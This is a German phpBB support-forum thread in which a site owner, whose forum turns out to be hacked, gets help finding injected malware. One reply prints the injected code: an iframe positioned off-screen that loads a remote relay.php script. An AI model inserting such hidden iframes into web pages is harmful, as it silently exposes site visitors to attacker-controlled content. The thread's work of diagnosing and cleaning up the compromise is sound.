Auflösung Schrift plötzlich groß

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Tionne
Mitglied
Beiträge: 6
Registriert: 23.10.2013 07:37

Auflösung Schrift plötzlich groß

Beitrag von Tionne »

Hallo zusammen!
Ich habe jetzt hier ziemlich lange gesucht, aber kein explizit passendes Thema gefunden. Sollte ich es übersehen habe, dann bitte ich um Entschuldigung.
Vor einigen Wochen hatten wir eine Virenwarnung auf unserer Seite, weshalb i ch das Forum neu aufgesetzt habe. Es lief auch alles ganz toll wieder, Virus war weg, alle wichtigen Vereine informiert etc ...
Dann plötzlich war die Auflösung und Schrift des Forums von einem auf den anderen Tag verändert. Viel zu groß und falsch. Hier ein Link!
http://www.skriptorium.net (Achtung: evtl. Viren belastet)
In Firefox und IE dasselbe Ergebnis ... daraufhin habe ich das Forum noch einmal neu gemacht und wieder lief es ein paar Tage und jetzt zack, hat es sich wieder umgestellt.
Ich habe noch das phpbb 3.0.11, aber daran kann es nicht liegen, denn ich hatte beim ersten mal ein Update auf 3.0.12 gemacht und da ist es auch passiert, weshalb ich das Update jetzt erst einmal gelassen habe, um das zu beobachten.
Ich bin total ratlos und hoffe nicht, dass die Datenbank irgendwie beschädigt ist ... Ich habe keinerlei Mods eingebaut und lediglich das Design ein wenig im stylesheet geändert ... images und Farben halt ...
Kann mir jemand hier helfen, ist das Problem eventuell doch schon bekannt hier???
Gruß Tio
Zuletzt geändert von Crizzo am 23.10.2013 08:24, insgesamt 1-mal geändert.
Grund: Warnung ergänzt
Benutzeravatar
T-M
Mitglied
Beiträge: 113
Registriert: 15.04.2013 12:13

Re: Auflösung Schrift plötzlich groß

Beitrag von T-M »

Hallo,

mein Virenprogramm schlägt Alarm beim Besuch deines Forums.
KB:gehackt
KB:sicher

LG T.M
Es gibt nur 10 Arten von Menschen. Die, die binär verstehen - und die, die es nicht tun.
Tionne
Mitglied
Beiträge: 6
Registriert: 23.10.2013 07:37

Re: Auflösung Schrift plötzlich groß

Beitrag von Tionne »

Das ist sehr komisch, denn erst gestern habe ich von meinem Hoster die Bestätigung bekommen, dass unser Forum jetzt virenfrei ist.
Ich verzweifel langsam ...
was für eine Warnung bekommst du denn? eine spezielle?
kann es sein, dass das noch von der alten verseuchung her rührt? ich habe nämlich letztens auch festgestellt, dass einige unsere seite immer noch als infiziert melden, obwohl das längst behoben worden ist ... ich habe sämtliche dateien des forums gescannt, mit virenscanner und malwarebytes und da wurde nichts angezeigt ...
Benutzeravatar
Crizzo
Administrator
Administrator
Beiträge: 11968
Registriert: 19.05.2005 21:45
Kontaktdaten:

Re: Auflösung Schrift plötzlich groß

Beitrag von Crizzo »

Hi

Gut moglich , dass dein Rechner verseucht ist und du so immer neue Viren auf den Server lädst.

Grüße
Tionne
Mitglied
Beiträge: 6
Registriert: 23.10.2013 07:37

Re: Auflösung Schrift plötzlich groß

Beitrag von Tionne »

hi ..
das habe ich auch schon bedacht, aber auch auf meinem rechner habe ich alles gescannt und nichts wurde gefunden ... habe sogar das letzte forum von einer externen, zuvor gescannten, festplatte installiert und hochgeladen ... und hier im büro bekommen ich keinerlei virenwarnung, weder über IE noch über Firefox ...
Ist es möglich, dass sich der virus in der datenbank eingeschrieben hat, das ist das einzige, was ich immer wieder eingespielt und noch nicht gelöscht habe, weil ich davor zurück schrecke, weil dann unsere schönen geschichten weg wären .... :(
Helmut
Mitglied
Beiträge: 2048
Registriert: 27.12.2002 20:35
Wohnort: Augsburg

Re: Auflösung Schrift plötzlich groß

Beitrag von Helmut »

Hallo Tionne,

kann auch sein, dass da noch Code in einer oder mehreren Dateien vom Forum ist, der da nicht rein gehört. Beliebt sind da die php Dateien, da steht meistens am Ende vor ?> ein Schadcode. Auch in den Templates Dateien könnte was sein da musst du nach verdächtigen Links oder <script> Bereichen Ausschau halten. Ideal wäre wenn du noch ein Backup deiner Dateien hast, in denen dein "Virenbefall" noch nicht aufgetreten war, dann kannst du die Dateien vergleichen ob da was drinnen ist, das da nicht rein gehört.

Gruß Helmut
Ich bin nicht ganz dicht.... na und.
Tionne
Mitglied
Beiträge: 6
Registriert: 23.10.2013 07:37

Re: Auflösung Schrift plötzlich groß

Beitrag von Tionne »

hmmm... das muss ich mal zuhause checken ... wobei ich jedoch mit einem völlig neuen phpbb -paket das forum aufgespielt habe und lediglich die datenbank eingespielt habe ..
aber vielen dank, das werde3 ich mal checken ...
Benutzeravatar
Miriam
Mitglied
Beiträge: 12310
Registriert: 13.10.2004 07:18
Kontaktdaten:

Re: Auflösung Schrift plötzlich groß

Beitrag von Miriam »

Das hier ist der Schadcode, bzw. der Aufruf des Codes auf Deiner Webseite:

Code: Alles auswählen

<iframe id="wijwe" name="wijwe" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://tmoo.cl/relay.php" > </iframe>
Schau hier: [ externes Bild ]

Den Cache hattest Du geleert nach der Säuberung?
Gruss, Miriam.
Ich schmeiß' alles hin und...
... lasse es liegen
Tionne
Mitglied
Beiträge: 6
Registriert: 23.10.2013 07:37

Re: Auflösung Schrift plötzlich groß

Beitrag von Tionne »

Hallo zusammen!
Vielen lieben Dank für eure Hilfe.
Miriam, das ist der Hammer, das hätte ich so nie gefunden :o
Mein Hoster hat festgestellt, dass mein ftp-Passwort gehackt wurde und eine IP aus dem Ausland, einfach neue Files mit diesen Schadcodes hochgeladen hat ... Himmel, wenn ich mal so einen erwische, dann lade ich dem auch was hoch ... *grummel*
Jetzt bin ich dabei alles wieder schön neu zu machen und hoffe, dass das nicht mehr passiert. Ist wohl schon viel zu viele Jahre gut gegangen ...
Also noch einmal vielen Dank, das war großartig von euch.
Gruß Tio
Benutzeravatar
AYYILDIZLAR
Ehemaliges Teammitglied
Beiträge: 4148
Registriert: 09.11.2010 18:08
Kontaktdaten:

Re: Auflösung Schrift plötzlich groß

Beitrag von AYYILDIZLAR »

Hallo,

Du solltest dir auf jeden Fall aus dem einen Artikel, was dir bereits schon verlinkt wurde KB:36 insbesondere diesen Absatz hier Das Passwort zur Brust nehmen. Da stehen gute Tipps im Bezug auf Passwort erstellen usw.


Grüße
DasEtwasAndereMotorradforum.de
Deutsche Übersetzung der Tapatalk Extension | Deutsche Übersetzung der Tapatalk MOD
Bitte keine PN wegen Support, werde diese zukünftig ignorieren und gleich löschen.
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“